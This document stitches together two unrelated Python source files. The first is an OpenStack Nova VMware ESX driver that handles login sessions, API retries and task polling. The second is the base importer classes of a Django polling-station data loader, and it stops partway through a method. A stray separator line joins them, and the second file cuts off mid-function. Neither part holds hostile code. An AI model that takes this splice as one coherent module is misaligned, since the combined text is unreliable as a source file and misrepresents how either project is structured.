# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to the VMware ESX platform.
**Related Flags**
:vmwareapi_host_ip: IPAddress of VMware ESX server.
:vmwareapi_host_username: Username for connection to VMware ESX Server.
:vmwareapi_host_password: Password for connection to VMware ESX Server.
:vmwareapi_task_poll_interval: The interval (seconds) used for polling of
remote tasks
(default: 1.0).
:vmwareapi_api_retry_count: The API retry count in case of failure such as
network failures (socket errors etc.)
(default: 10).
"""
import time
from eventlet import event
from nova import context
from nova import db
from nova import exception
from nova import flags
from nova import log as logging
from nova.openstack.common import cfg
from nova import utils
from nova.virt import driver
from nova.virt.vmwareapi import error_util
from nova.virt.vmwareapi import vim
from nova.virt.vmwareapi import vim_util
from nova.virt.vmwareapi import vmops
LOG = logging.getLogger(__name__)
# Configuration options for the vmwareapi connection type.
vmwareapi_opts = [
    cfg.StrOpt('vmwareapi_host_ip',
               default=None,
               # Fixed: missing space after the full stop in the help text.
               help='URL for connection to VMWare ESX host. Required if '
                    'connection_type is vmwareapi.'),
    cfg.StrOpt('vmwareapi_host_username',
               default=None,
               help='Username for connection to VMWare ESX host. '
                    'Used only if connection_type is vmwareapi.'),
    cfg.StrOpt('vmwareapi_host_password',
               default=None,
               help='Password for connection to VMWare ESX host. '
                    'Used only if connection_type is vmwareapi.'),
    cfg.FloatOpt('vmwareapi_task_poll_interval',
                 default=5.0,
                 help='The interval used for polling of remote tasks. '
                      'Used only if connection_type is vmwareapi'),
    # NOTE(review): a retry count is conceptually an integer; declared as
    # FloatOpt here. Left as-is to avoid changing option parsing behavior,
    # but consider cfg.IntOpt.
    cfg.FloatOpt('vmwareapi_api_retry_count',
                 default=10,
                 help='The number of times we retry on failures, e.g., '
                      'socket error, etc. '
                      'Used only if connection_type is vmwareapi'),
    cfg.StrOpt('vmwareapi_vlan_interface',
               default='vmnic0',
               help='Physical ethernet adapter name for vlan networking'),
]
FLAGS = flags.FLAGS
FLAGS.register_opts(vmwareapi_opts)
# Seconds slept between retries inside VMWareAPISession._call_method
TIME_BETWEEN_API_CALL_RETRIES = 2.0
class Failure(Exception):
    """Base exception class for handling task failures."""
    def __init__(self, details):
        # Keep the raw failure payload reported by the remote task.
        self.details = details
    def __str__(self):
        # The message is entirely whatever was supplied as details.
        return "%s" % (self.details,)
def get_connection(_read_only):
    """Sets up the ESX host connection.

    Reads host/credential settings from FLAGS and returns a
    VMWareESXConnection. Raises if any required flag is missing.
    """
    host_ip = FLAGS.vmwareapi_host_ip
    host_username = FLAGS.vmwareapi_host_username
    host_password = FLAGS.vmwareapi_host_password
    api_retry_count = FLAGS.vmwareapi_api_retry_count
    if not host_ip or host_username is None or host_password is None:
        # Adjacent string literals are concatenated by the parser; each
        # fragment needs a trailing space so the rendered message reads
        # correctly (previously: "vmwareapi_host_ip,vmwareapi_host_username"
        # and "useconnection_type").
        raise Exception(_("Must specify vmwareapi_host_ip, "
                          "vmwareapi_host_username "
                          "and vmwareapi_host_password to use "
                          "connection_type=vmwareapi"))
    return VMWareESXConnection(host_ip, host_username, host_password,
                               api_retry_count)
class VMWareESXConnection(driver.ComputeDriver):
    """The ESX host connection object.

    Thin facade over VMWareVMOps: every instance operation delegates to
    self._vmops, which talks to the ESX host through a VMWareAPISession.
    """
    def __init__(self, host_ip, host_username, host_password,
                 api_retry_count, scheme="https"):
        super(VMWareESXConnection, self).__init__()
        session = VMWareAPISession(host_ip, host_username, host_password,
                                   api_retry_count, scheme=scheme)
        self._vmops = vmops.VMWareVMOps(session)
    def init_host(self, host):
        """Do the initialization that needs to be done."""
        # FIXME(sateesh): implement this
        pass
    def list_instances(self):
        """List VM instances."""
        return self._vmops.list_instances()
    def spawn(self, context, instance, image_meta, network_info,
              block_device_mapping=None):
        """Create VM instance."""
        # NOTE(review): block_device_mapping is accepted for driver API
        # compatibility but not forwarded to vmops.
        self._vmops.spawn(context, instance, image_meta, network_info)
    def snapshot(self, context, instance, name):
        """Create snapshot from a running VM instance."""
        self._vmops.snapshot(context, instance, name)
    def reboot(self, instance, network_info, reboot_type):
        """Reboot VM instance."""
        # NOTE(review): reboot_type is ignored by the vmops implementation.
        self._vmops.reboot(instance, network_info)
    def destroy(self, instance, network_info, block_device_info=None):
        """Destroy VM instance."""
        self._vmops.destroy(instance, network_info)
    def pause(self, instance):
        """Pause VM instance."""
        self._vmops.pause(instance)
    def unpause(self, instance):
        """Unpause paused VM instance."""
        self._vmops.unpause(instance)
    def suspend(self, instance):
        """Suspend the specified instance."""
        self._vmops.suspend(instance)
    def resume(self, instance):
        """Resume the suspended VM instance."""
        self._vmops.resume(instance)
    def get_info(self, instance):
        """Return info about the VM instance."""
        return self._vmops.get_info(instance)
    def get_diagnostics(self, instance):
        """Return data about VM diagnostics."""
        # NOTE(review): delegates to get_info(), not a dedicated diagnostics
        # call -- confirm this is intentional.
        return self._vmops.get_info(instance)
    def get_console_output(self, instance):
        """Return snapshot of console."""
        return self._vmops.get_console_output(instance)
    def get_volume_connector(self, _instance):
        """Return volume connector information"""
        # TODO(vish): When volume attaching is supported, return the
        # proper initiator iqn.
        return {
            'ip': FLAGS.vmwareapi_host_ip,
            'initiator': None
        }
    def attach_volume(self, connection_info, instance_name, mountpoint):
        """Attach volume storage to VM instance."""
        # Not implemented for the ESX driver yet.
        pass
    def detach_volume(self, connection_info, instance_name, mountpoint):
        """Detach volume storage to VM instance."""
        # Not implemented for the ESX driver yet.
        pass
    def get_console_pool_info(self, console_type):
        """Get info about the host on which the VM resides."""
        return {'address': FLAGS.vmwareapi_host_ip,
                'username': FLAGS.vmwareapi_host_username,
                'password': FLAGS.vmwareapi_host_password}
    def update_available_resource(self, ctxt, host):
        """This method is supported only by libvirt."""
        return
    def host_power_action(self, host, action):
        """Reboots, shuts down or powers up the host."""
        raise NotImplementedError()
    def host_maintenance_mode(self, host, mode):
        """Start/Stop host maintenance window. On start, it triggers
        guest VMs evacuation."""
        raise NotImplementedError()
    def set_host_enabled(self, host, enabled):
        """Sets the specified host's ability to accept new instances."""
        raise NotImplementedError()
    def plug_vifs(self, instance, network_info):
        """Plug VIFs into networks."""
        self._vmops.plug_vifs(instance, network_info)
    def unplug_vifs(self, instance, network_info):
        """Unplug VIFs from networks."""
        self._vmops.unplug_vifs(instance, network_info)
class VMWareAPISession(object):
    """
    Sets up a session with the ESX host and handles all
    the calls made to the host.

    NOTE: this module is Python 2 code (`except Exception, e` syntax).
    """
    def __init__(self, host_ip, host_username, host_password,
                 api_retry_count, scheme="https"):
        self._host_ip = host_ip
        self._host_username = host_username
        self._host_password = host_password
        self.api_retry_count = api_retry_count
        self._scheme = scheme
        self._session_id = None
        self.vim = None
        # Eagerly authenticate so a bad configuration fails at construction
        self._create_session()
    def _get_vim_object(self):
        """Create the VIM Object instance."""
        return vim.Vim(protocol=self._scheme, host=self._host_ip)
    def _create_session(self):
        """Creates a session with the ESX host."""
        while True:
            try:
                # Login and setup the session with the ESX host for making
                # API calls
                self.vim = self._get_vim_object()
                session = self.vim.Login(
                    self.vim.get_service_content().sessionManager,
                    userName=self._host_username,
                    password=self._host_password)
                # Terminate the earlier session, if possible ( For the sake of
                # preserving sessions as there is a limit to the number of
                # sessions we can have )
                if self._session_id:
                    try:
                        self.vim.TerminateSession(
                            self.vim.get_service_content().sessionManager,
                            sessionId=[self._session_id])
                    except Exception, excep:
                        # This exception is something we can live with. It is
                        # just an extra caution on our side. The session may
                        # have been cleared. We could have made a call to
                        # SessionIsActive, but that is an overhead because we
                        # anyway would have to call TerminateSession.
                        LOG.debug(excep)
                self._session_id = session.key
                return
            except Exception, excep:
                LOG.critical(_("In vmwareapi:_create_session, "
                               "got this exception: %s") % excep)
                raise exception.Error(excep)
    def __del__(self):
        """Logs-out the session."""
        # Logout to avoid un-necessary increase in session count at the
        # ESX host
        try:
            self.vim.Logout(self.vim.get_service_content().sessionManager)
        except Exception, excep:
            # It is just cautionary on our part to do a logout in del just
            # to ensure that the session is not left active.
            LOG.debug(excep)
    def _is_vim_object(self, module):
        """Check if the module is a VIM Object instance."""
        return isinstance(module, vim.Vim)
    def _call_method(self, module, method, *args, **kwargs):
        """
        Calls a method within the module specified with
        args provided.

        Retries up to self.api_retry_count times on session faults and
        overload, re-creating the session when authentication is lost.
        """
        args = list(args)
        retry_count = 0
        exc = None
        last_fault_list = []
        while True:
            try:
                if not self._is_vim_object(module):
                    # If it is not the first try, then get the latest
                    # vim object
                    if retry_count > 0:
                        args = args[1:]
                    # Non-VIM helpers take the vim object as first argument
                    args = [self.vim] + args
                retry_count += 1
                # Resolve a dotted method path relative to the module
                temp_module = module
                for method_elem in method.split("."):
                    temp_module = getattr(temp_module, method_elem)
                return temp_module(*args, **kwargs)
            except error_util.VimFaultException, excep:
                # If it is a Session Fault Exception, it may point
                # to a session gone bad. So we try re-creating a session
                # and then proceeding ahead with the call.
                exc = excep
                if error_util.FAULT_NOT_AUTHENTICATED in excep.fault_list:
                    # Because of the idle session returning an empty
                    # RetrievePropertiesResponse and also the same is returned
                    # when there is say empty answer to the query for
                    # VMs on the host ( as in no VMs on the host), we have no
                    # way to differentiate.
                    # So if the previous response was also an empty response
                    # and after creating a new session, we get the same empty
                    # response, then we are sure of the response being supposed
                    # to be empty.
                    if error_util.FAULT_NOT_AUTHENTICATED in last_fault_list:
                        return []
                    last_fault_list = excep.fault_list
                    self._create_session()
                else:
                    # No re-trying for errors for API call has gone through
                    # and is the caller's fault. Caller should handle these
                    # errors. e.g, InvalidArgument fault.
                    break
            except error_util.SessionOverLoadException, excep:
                # For exceptions which may come because of session overload,
                # we retry
                exc = excep
            except Exception, excep:
                # If it is a proper exception, say not having furnished
                # proper data in the SOAP call or the retry limit having
                # exceeded, we raise the exception
                exc = excep
                break
            # If retry count has been reached then break and
            # raise the exception
            if retry_count > self.api_retry_count:
                break
            time.sleep(TIME_BETWEEN_API_CALL_RETRIES)
        LOG.critical(_("In vmwareapi:_call_method, "
                       "got this exception: %s") % exc)
        raise
    def _get_vim(self):
        """Gets the VIM object reference, creating a session lazily."""
        if self.vim is None:
            self._create_session()
        return self.vim
    def _wait_for_task(self, instance_uuid, task_ref):
        """
        Return a Deferred that will give the result of the given task.
        The task is polled until it completes.
        """
        done = event.Event()
        loop = utils.LoopingCall(self._poll_task, instance_uuid, task_ref,
                                 done)
        loop.start(FLAGS.vmwareapi_task_poll_interval)
        # Blocks until _poll_task sends a result or an exception
        ret_val = done.wait()
        loop.stop()
        return ret_val
    def _poll_task(self, instance_uuid, task_ref, done):
        """
        Poll the given task, and fires the given Deferred if we
        get a result.
        """
        try:
            task_info = self._call_method(vim_util, "get_dynamic_property",
                                          task_ref, "Task", "info")
            task_name = task_info.name
            action = dict(
                instance_uuid=instance_uuid,
                action=task_name[0:255],
                error=None)
            if task_info.state in ['queued', 'running']:
                # Still in progress; keep polling
                return
            elif task_info.state == 'success':
                LOG.debug(_("Task [%(task_name)s] %(task_ref)s "
                            "status: success") % locals())
                done.send("success")
            else:
                error_info = str(task_info.error.localizedMessage)
                action["error"] = error_info
                LOG.warn(_("Task [%(task_name)s] %(task_ref)s "
                           "status: error %(error_info)s") % locals())
                done.send_exception(exception.Error(error_info))
            # Record the completed action (success or error) in the DB
            db.instance_action_create(context.get_admin_context(), action)
        except Exception, excep:
            LOG.warn(_("In vmwareapi:_poll_task, Got this error %s") % excep)
            done.send_exception(excep)
| |
"""
Defines the base importer classes to implement
"""
import abc
import json
import glob
import logging
import os
import tempfile
import urllib.request
import rtree
from django.apps import apps
from django.contrib.gis import geos
from django.core.management.base import BaseCommand
from django.conf import settings
from django.contrib.gis.geos import Point, GEOSGeometry, GEOSException
from addressbase.models import UprnToCouncil
from councils.models import Council
from data_importers.data_types import AddressList, DistrictSet, StationSet
from data_importers.data_quality_report import (
DataQualityReportBuilder,
StationReport,
DistrictReport,
AddressReport,
)
from data_importers.contexthelpers import Dwellings
from data_importers.filehelpers import FileHelperFactory
from data_importers.loghelper import LogHelper
from data_importers.s3wrapper import S3Wrapper
from pollingstations.models import PollingDistrict, PollingStation
from data_importers.models import DataQuality
class CsvMixin:
    """Mixin that supplies CSV reading options for get_data().

    Subclasses may override ``csv_encoding`` / ``csv_delimiter`` as class
    or instance attributes.
    """
    csv_encoding = "utf-8"
    csv_delimiter = ","
    def get_csv_options(self):
        """Bundle the CSV options into the dict shape the file helper expects."""
        return {
            "csv_encoding": self.csv_encoding,
            "csv_delimiter": self.csv_delimiter,
        }
class ShpMixin:
    """Mixin that supplies shapefile reading options for get_data()."""
    shp_encoding = "utf-8"
    def get_shp_options(self):
        """Bundle the shapefile options into a dict."""
        return dict(shp_encoding=self.shp_encoding)
class BaseImporter(BaseCommand, metaclass=abc.ABCMeta):
    """
    Abstract base for council data import management commands.

    Turn off auto system check for all apps
    We will manually run system checks only for the
    'data_importers' and 'pollingstations' apps
    """
    requires_system_checks = []
    srid = 27700            # default spatial reference (British National Grid)
    council_id = None       # set by subclass or taken from command args
    base_folder_path = None
    logger = None
    batch_size = None
    imports_districts = False
    use_postcode_centroids = False
    def write_info(self, message):
        # Respect --verbosity 0: suppress informational output entirely
        if self.verbosity > 0:
            self.stdout.write(message)
    def add_arguments(self, parser):
        parser.add_argument(
            "--nochecks",
            help="<Optional> Do not perform validation checks or display context information",
            action="store_true",
            required=False,
            default=False,
        )
        parser.add_argument(
            "-p",
            "--use-postcode-centroids",
            help="<optional> Use postcode centroids to derive a location for polling stations",
            action="store_true",
            required=False,
            default=False,
        )
    def teardown(self, council):
        """Delete previously imported data for this council."""
        PollingStation.objects.filter(council=council).delete()
        PollingDistrict.objects.filter(council=council).delete()
        UprnToCouncil.objects.filter(lad__in=council.identifiers).update(
            polling_station_id=""
        )
    def get_council(self, council_id):
        return Council.objects.get(pk=council_id)
    def get_data(self, filetype, filename):
        """Open `filename` via FileHelperFactory and return its features,
        merging in any CSV/SHP options provided by mixins."""
        options = {}
        if hasattr(self, "get_csv_options"):
            options.update(self.get_csv_options())
        if hasattr(self, "get_shp_options"):
            options.update(self.get_shp_options())
        helper = FileHelperFactory.create(filetype, filename, options)
        return helper.get_features()
    def get_srid(self, type=None):
        # `type` (shadows the builtin) selects the districts-specific SRID
        # when a subclass declares one; otherwise fall back to self.srid
        if (
            hasattr(self, "districts_srid")
            and type == "districts"
            and self.districts_srid is not None
        ):
            return self.districts_srid
        else:
            return self.srid
    @abc.abstractmethod
    def import_data(self):
        pass
    def post_import(self):
        # Optional hook; handle() swallows this NotImplementedError
        raise NotImplementedError
    def report(self):
        """Build the data quality report, persist it, and print it."""
        # build report
        if hasattr(self, "csv_row_count"):
            report = DataQualityReportBuilder(
                self.council.pk,
                expecting_districts=self.imports_districts,
                csv_rows=self.csv_row_count,
            )
        else:
            report = DataQualityReportBuilder(
                self.council.pk, expecting_districts=self.imports_districts
            )
        station_report = StationReport(self.council.pk)
        district_report = DistrictReport(self.council.pk)
        address_report = AddressReport(self.council.pk)
        report.build_report()
        # save a static copy in the DB that we can serve up on the website
        # (get_or_create returns an (object, created) tuple)
        record = DataQuality.objects.get_or_create(council_id=self.council.pk)
        record[0].report = report.generate_string_report()
        record[0].num_stations = station_report.get_stations_imported()
        record[0].num_districts = district_report.get_districts_imported()
        record[0].num_addresses = address_report.get_addresses_with_station_id()
        record[0].save()
        # output to console
        report.output_console_report()
    @property
    def data_path(self):
        # Prefer a local data directory; otherwise pull from S3
        if getattr(settings, "PRIVATE_DATA_PATH", None):
            path = settings.PRIVATE_DATA_PATH
        else:
            s3 = S3Wrapper()
            s3.fetch_data_by_council(self.council_id)
            path = s3.data_path
        return os.path.abspath(path)
    def get_base_folder_path(self):
        if getattr(self, "local_files", True):
            if self.base_folder_path is None:
                path = os.path.join(self.data_path, self.council_id)
                # NOTE(review): raises IndexError if no folder matches
                return glob.glob(path)[0]
        return self.base_folder_path
    def handle(self, *args, **kwargs):
        """
        Manually run system checks for the
        'data_importers' and 'pollingstations' apps
        Management commands can ignore checks that only apply to
        the apps supporting the website part of the project
        """
        self.check(
            [
                apps.get_app_config("data_importers"),
                apps.get_app_config("pollingstations"),
            ]
        )
        self.verbosity = kwargs.get("verbosity")
        self.logger = LogHelper(self.verbosity)
        self.validation_checks = not (kwargs.get("nochecks"))
        self.allow_station_point_from_postcode = kwargs.get("use_postcode_centroids")
        if self.council_id is None:
            self.council_id = args[0]
        self.council = self.get_council(self.council_id)
        self.write_info("Importing data for %s..." % self.council.name)
        # Delete old data for this council
        self.teardown(self.council)
        self.base_folder_path = self.get_base_folder_path()
        self.import_data()
        # Optional step for post import tasks
        try:
            self.post_import()
        except NotImplementedError:
            pass
        # save and output data quality report
        if self.verbosity > 0:
            self.report()
class BaseStationsImporter(BaseImporter, metaclass=abc.ABCMeta):
    """Abstract importer for polling station records.

    Subclasses declare where the station data lives (stations_name /
    stations_filetype) and how to convert one raw record to a dict
    (station_record_to_dict).
    """
    stations = None
    @property
    @abc.abstractmethod
    def stations_filetype(self):
        pass
    @property
    @abc.abstractmethod
    def stations_name(self):
        pass
    def get_stations(self):
        # Load station features from the council's data folder
        stations_file = os.path.join(self.base_folder_path, self.stations_name)
        return self.get_data(self.stations_filetype, stations_file)
    @abc.abstractmethod
    def station_record_to_dict(self, record):
        pass
    def get_station_hash(self, station):
        # Optional de-duplication hook; see import_polling_stations()
        raise NotImplementedError
    def check_station_point(self, station_record):
        # Only run the geometry checks when the record carries a location
        if station_record["location"]:
            self.check_in_council_bounds(station_record)
            self.check_duplicate_location(station_record)
    def check_duplicate_location(self, station_record):
        """Warn when this station sits at (almost) the same point as an
        already-imported station that has a different postcode."""
        stations_with_location_and_different_postcode = [
            s
            for s in self.stations.elements
            if s.location and (s.postcode != station_record["postcode"])
        ]
        if not stations_with_location_and_different_postcode:
            return
        # Use the most common SRID among existing stations for comparisons
        srids = [
            GEOSGeometry(s.location).srid
            for s in stations_with_location_and_different_postcode
        ]
        srid_to_use = max(srids, key=srids.count)
        # Threshold is in the SRID's native units (degrees vs metres).
        # NOTE(review): `threshold` is unbound below if srid_to_use is
        # neither 4326 nor 27700 -- would raise UnboundLocalError.
        if srid_to_use == 4326:
            threshold = 0.001
        if srid_to_use == 27700:
            threshold = 10
        # Spatial index of existing station points for a fast proximity query
        station_index = rtree.index.Index()
        for i, station in enumerate(stations_with_location_and_different_postcode):
            geom = GEOSGeometry(station.location).transform(srid_to_use, clone=True)
            station_index.insert(i, (geom.x, geom.y, geom.x, geom.y))
        record_geom = station_record["location"].transform(srid_to_use, clone=True)
        nearest_ids = list(
            station_index.intersection(
                (
                    record_geom.x - threshold,
                    record_geom.y - threshold,
                    record_geom.x + threshold,
                    record_geom.y + threshold,
                ),
                1,
            )
        )
        if not nearest_ids:
            return
        for i in nearest_ids:
            station = stations_with_location_and_different_postcode[i.id]
            def get_name(address):
                # First two lines of the address serve as a display name
                return " ".join(address.split("\n")[:2])
            self.logger.log_message(
                logging.WARNING,
                f"Polling stations '{get_name(station_record['address'])}' and "
                f"'{get_name(station.address)}' "
                "are at approximately the same location, but have different postcodes:\n"
                f"qgis filter exp: \"internal_council_id\" IN ('{station_record['internal_council_id']}','{station.internal_council_id}')", # qgis filter expression
            )
    def check_in_council_bounds(self, station_record):
        """Warn when the station point falls outside the target council."""
        try:
            council = Council.objects.get(
                geography__geography__covers=station_record["location"]
            )
            if self.council_id != council.council_id:
                self.logger.log_message(
                    logging.WARNING,
                    f"Polling station {station_record['internal_council_id']} is in {council.name} ({council.council_id}) "
                    f"but target council is {self.council.name} ({self.council.council_id}) - manual check recommended\n",
                )
        except Council.DoesNotExist:
            self.logger.log_message(
                logging.WARNING,
                "Polling station %s is not covered by any council area - manual check recommended\n",
                variable=(station_record["internal_council_id"]),
            )
    def import_polling_stations(self):
        """Read, validate, and queue every polling station record."""
        stations = self.get_stations()
        if not isinstance(self, BaseAddressesImporter):
            self.write_info(
                "Stations: Found %i features in input file" % (len(stations))
            )
        seen = set()
        for station in stations:
            """
            We can optionally define a function get_station_hash()
            This is useful if residential addresses and polling
            station details are embedded in the same input file
            We can use this to avoid calling station_record_to_dict()
            (which is potentially quite a slow operation)
            on a record where we have already processed the station data
            to make the import process run more quickly.
            """
            try:
                station_hash = self.get_station_hash(station)
                if station_hash in seen:
                    continue
                else:
                    self.logger.log_message(
                        logging.INFO,
                        "Polling station added to set:\n%s",
                        variable=station,
                        pretty=True,
                    )
                    seen.add(station_hash)
            except NotImplementedError:
                # Subclass did not opt in to hash-based de-duplication
                pass
            if self.stations_filetype in ["shp", "shp.zip"]:
                record = station.record
            else:
                record = station
            station_info = self.station_record_to_dict(record)
            """
            station_record_to_dict() will usually return a dict
            but it may also optionally return a list of dicts.
            This is helpful if we encounter a polling station record
            with a delimited list of polling districts served by this
            polling station: it allows us to add the same station
            address/point many times with different district ids.
            """
            if isinstance(station_info, list):
                self.logger.log_message(
                    logging.INFO,
                    "station_record_to_dict() returned list with input:\n%s",
                    variable=record,
                    pretty=True,
                )
                station_records = station_info
            else:
                # If station_info is a dict, create a singleton list
                station_records = [station_info]
            for station_record in station_records:
                """
                station_record_to_dict() may optionally return None
                if we want to exclude a particular station record
                from being imported
                """
                if station_record is None:
                    self.logger.log_message(
                        logging.INFO,
                        "station_record_to_dict() returned None with input:\n%s",
                        variable=record,
                        pretty=True,
                    )
                    continue
                if "council" not in station_record:
                    station_record["council"] = self.council
                """
                If the file type is shp, we can usually derive 'location'
                automatically, but we can return it if necessary.
                For other file types, we must return the key
                'location' from station_record_to_dict()
                """
                if (
                    self.stations_filetype in ["shp", "shp.zip"]
                    and "location" not in station_record
                ):
                    if len(station.shape.points) == 1:
                        # we've got a point
                        station_record["location"] = Point(
                            *station.shape.points[0], srid=self.get_srid()
                        )
                    else:
                        # its a polygon: simplify it to a centroid and warn
                        self.logger.log_message(
                            logging.WARNING,
                            "Implicitly converting station geometry to point",
                        )
                        geojson = json.dumps(station.shape.__geo_interface__)
                        poly = self.clean_poly(GEOSGeometry(geojson))
                        poly.srid = self.get_srid()
                        station_record["location"] = poly.centroid
                if self.validation_checks:
                    self.check_station_point(station_record)
                self.add_polling_station(station_record)
    def add_polling_station(self, station_info):
        # Stations are accumulated in memory and saved elsewhere
        self.stations.add(station_info)
class BaseDistrictsImporter(BaseImporter, metaclass=abc.ABCMeta):
    """Abstract importer for polling district (boundary) records."""
    imports_districts = True
    districts = None
    districts_srid = None
    @property
    @abc.abstractmethod
    def districts_filetype(self):
        pass
    @property
    @abc.abstractmethod
    def districts_name(self):
        pass
    def get_districts(self):
        # Load district features from the council's data folder
        districts_file = os.path.join(self.base_folder_path, self.districts_name)
        return self.get_data(self.districts_filetype, districts_file)
    def clean_poly(self, poly):
        # Normalize single Polygons to MultiPolygon; pass everything else through
        if isinstance(poly, geos.Polygon):
            poly = geos.MultiPolygon(poly, srid=self.get_srid("districts"))
            return poly
        return poly
    def strip_z_values(self, geojson):
        """Drop Z coordinates from a GeoJSON geometry and flatten it to a
        Polygon. NOTE(review): only processes the first ring of the first
        polygon's coordinate array -- confirm against the input data."""
        districts = json.loads(geojson)
        districts["type"] = "Polygon"
        for points in districts["coordinates"][0][0]:
            if len(points) == 3:
                points.pop()
        districts["coordinates"] = districts["coordinates"][0]
        return json.dumps(districts)
    @abc.abstractmethod
    def district_record_to_dict(self, record):
        pass
    def check_district_overlap(self, district_record):
        """Log how much of the district lies inside the target council's
        boundary; returns the overlap percentage (or None on GEOS error)."""
        if self.council.geography.geography.contains(district_record["area"]):
            self.logger.log_message(
                logging.INFO,
                "District %s is fully contained by target local auth",
                variable=district_record["internal_council_id"],
            )
            return 100
        try:
            # Intersect in WGS84, then measure areas in metres (EPSG:27700)
            intersection = self.council.geography.geography.intersection(
                district_record["area"].transform(4326, clone=True)
            )
            district_area = district_record["area"].transform(27700, clone=True).area
            intersection_area = intersection.transform(27700, clone=True).area
        except GEOSException as e:
            self.logger.log_message(logging.ERROR, str(e))
            return
        overlap_percentage = (intersection_area / district_area) * 100
        if overlap_percentage > 99:
            # meh - close enough
            level = logging.INFO
        else:
            level = logging.WARNING
        self.logger.log_message(
            level,
            "District {0} is {1:.2f}% contained by target local auth".format(
                district_record["internal_council_id"], overlap_percentage
            ),
        )
        return overlap_percentage
    def import_polling_districts(self):
        """Read, validate, and queue every polling district record."""
        districts = self.get_districts()
        self.write_info("Districts: Found %i features in input file" % (len(districts)))
        for district in districts:
            if self.districts_filetype in ["shp", "shp.zip"]:
                district_info = self.district_record_to_dict(district.record)
            else:
                district_info = self.district_record_to_dict(district)
            """
            district_record_to_dict() may optionally return None
            if we want to exclude a particular district record
            from being imported
            """
            if district_info is None:
                self.logger.log_message(
                    logging.INFO,
                    "district_record_to_dict() returned None with input:\n%s",
                    variable=district,
                    pretty=True,
                )
                continue
            if "council" not in district_info:
                district_info["council"] = self.council
            """
            If the file type is shp or geojson, we can usually derive
            'area' automatically, but we can return it if necessary.
            For other file types, we must return the key
            'area' from address_record_to_dict()
            """
            if self.districts_filetype in ["shp", "shp.zip"]:
                geojson = json.dumps(district.shape.__geo_interface__)
            if self.districts_filetype == "geojson":
                geojson = json.dumps(district["geometry"])
            if "area" not in district_info and (
                self.districts_filetype in ["shp", "shp.zip", "geojson"]
            ):
                poly = self.clean_poly(GEOSGeometry(geojson))
                poly.srid = self.get_srid("districts")
                district_info["area"] = poly
            if self.validation_checks:
                self.check_district_overlap(district_info)
            self.add_polling_district(district_info)
    def add_polling_district(self, district_info):
        # Districts are accumulated in memory and saved elsewhere
        self.districts.add(district_info)
class BaseAddressesImporter(BaseImporter, metaclass=abc.ABCMeta):
    """Importer mixin that loads residential address records."""

    # Set to an AddressList by the concrete import_data() implementation.
    addresses = None

    @property
    @abc.abstractmethod
    def addresses_filetype(self):
        # e.g. "csv"
        pass

    @property
    @abc.abstractmethod
    def addresses_name(self):
        # Addresses file name/path, relative to base_folder_path.
        pass

    def get_addresses(self):
        """Load and parse the addresses input file."""
        addresses_file = os.path.join(self.base_folder_path, self.addresses_name)
        return self.get_data(self.addresses_filetype, addresses_file)

    @abc.abstractmethod
    def address_record_to_dict(self, record):
        # Convert one raw input record to a dict of address fields,
        # or return None to exclude the record from the import.
        pass

    def write_context_data(self):
        """Print AddressBase / Census dwelling counts for sanity checking."""
        dwellings = Dwellings()
        self.write_info("----------------------------------")
        self.write_info("Contextual Data:")
        self.write_info(
            "Total UPRNs in AddressBase: {:,}".format(
                dwellings.from_addressbase(self.council.geography.geography)
            )
        )
        self.write_info(
            "Total Dwellings from 2011 Census: {:,}".format(
                dwellings.from_census(self.council.geography.gss)
            )
        )
        self.write_info("----------------------------------")

    def import_residential_addresses(self):
        """Parse, queue and then de-duplicate all residential addresses."""
        if self.validation_checks:
            self.write_context_data()
        addresses = self.get_addresses()
        self.csv_row_count = len(addresses)
        self.write_info(
            "Addresses: Found {:,} rows in input file".format(self.csv_row_count)
        )
        for address in addresses:
            address_info = self.address_record_to_dict(address)
            if address_info is None:
                self.logger.log_message(
                    logging.INFO,
                    "address_record_to_dict() returned None with input:\n%s",
                    variable=address,
                    pretty=True,
                )
                continue
            self.add_residential_address(address_info)
        # De-duplicate by hashing each record as a frozenset of its items.
        # Note: rebuilding from a set does not preserve the input ordering.
        element_set = set(frozenset(d.items()) for d in self.addresses.elements)
        self.write_info(
            "Addresses: Found {:,} unique records after converting to dicts. Removing duplicates".format(
                len(element_set)
            )
        )
        self.addresses.elements = [dict(s) for s in element_set]
        self.csv_row_count = len(self.addresses.elements)
        self.write_info(
            "Addresses: Found {:,} distinct records in input file".format(
                self.csv_row_count
            )
        )
        self.write_info("----------------------------------")

    def add_residential_address(self, address_info):
        """Normalise a single address record and queue it on self.addresses."""
        if "council" not in address_info:
            address_info["council"] = self.council
        if "uprn" not in address_info:
            address_info["uprn"] = ""
        else:
            # UPRNs less than 12 characters long may be left padded with zeros.
            # Making sure uprns in our addresslist are not left padded will help
            # with matching them and catching duplicates.
            address_info["uprn"] = str(address_info["uprn"]).lstrip("0")
        self.addresses.append(address_info)
class BaseStationsDistrictsImporter(BaseStationsImporter, BaseDistrictsImporter):
    """Importer that loads both polling stations and polling districts."""

    def pre_import(self):
        # Optional hook; import_data() deliberately swallows NotImplementedError.
        raise NotImplementedError

    @property
    def districts_have_station_ids(self):
        """
        Check that we've called self.import_polling_{districts,stations}
        Don't raise an exception though, because we might still want to
        import just stations or districts for debugging - i.e. to see them
        in qgis/the db. However if we don't also have the other half we
        won't be able to update the UprnToCouncil table.

        Returns True when districts carry station ids, False when stations
        carry district ids.
        """
        if len(self.districts.elements) < 1:
            self.logger.log_message(
                logging.WARNING, "No district records added to self.districts"
            )
        if len(self.stations.elements) < 1:
            self.logger.log_message(
                logging.WARNING, "No station records added to self.stations"
            )
        # Collect non-empty ids from both sides of the relationship.
        district_ids = {
            e.internal_council_id
            for e in self.districts.elements
            if e.internal_council_id != ""
        }
        station_ids_from_districts = {
            e.polling_station_id
            for e in self.districts.elements
            if e.polling_station_id != ""
        }
        station_ids = {
            e.internal_council_id
            for e in self.stations.elements
            if e.internal_council_id != ""
        }
        district_ids_from_stations = {
            e.polling_district_id
            for e in self.stations.elements
            if e.polling_district_id != ""
        }

        def get_missing(set_a, set_b):
            return set_a - set_b

        if station_ids_from_districts:
            self.write_info("Districts have station ids attached")
            missing_ids = get_missing(station_ids_from_districts, station_ids)
            for station_id in missing_ids:
                self.logger.log_message(
                    logging.WARNING,
                    "Station id: %s attached to a district but not found in stations",
                    variable=station_id,
                )
            for station_id in get_missing(station_ids, station_ids_from_districts):
                self.logger.log_message(
                    logging.WARNING,
                    "Station id: %s found in stations but not attached to any station",
                    variable=station_id,
                )
            return True
